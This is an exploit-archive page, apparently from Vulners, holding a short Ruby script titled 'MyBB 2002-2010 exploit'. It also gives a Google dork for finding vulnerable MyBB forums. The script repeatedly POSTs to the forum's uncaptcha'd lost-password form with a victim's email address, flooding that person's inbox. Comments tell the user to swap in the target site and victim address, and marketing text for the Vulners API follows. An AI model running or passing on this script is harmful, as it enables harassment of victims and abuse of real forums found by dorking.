======================
MyBB 2002-2010 exploit
======================
#!/usr/local/bin/ruby
#MyBB Owned
#30/03/10
#Ruby Code By, Whivack Gsk
#Win32 and Ruby Interpreter 1.8.6
#Dork Google : "Moteur MyBB, 2002-2010 MyBB Group."
#Sensitive URL : /member.php?action=lostpw
#No Security : No Captcha
#POST_Form Method : "email" and "action"
#It to serve freight forwarding of the customer in their insus
require 'net/http'
require 'uri'
comp = 0
while comp < 10
attack = Net::HTTP.post_form( URI.parse("http://siteweak.com/forum/member.php?action=lostpw"),
# Replace siteweak.com
{'email'=>'[email protected]', 'action'=>'do_lostpw'})
# Replace [email protected] by victim address
comp += 1
end
# 0day.today [2018-03-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation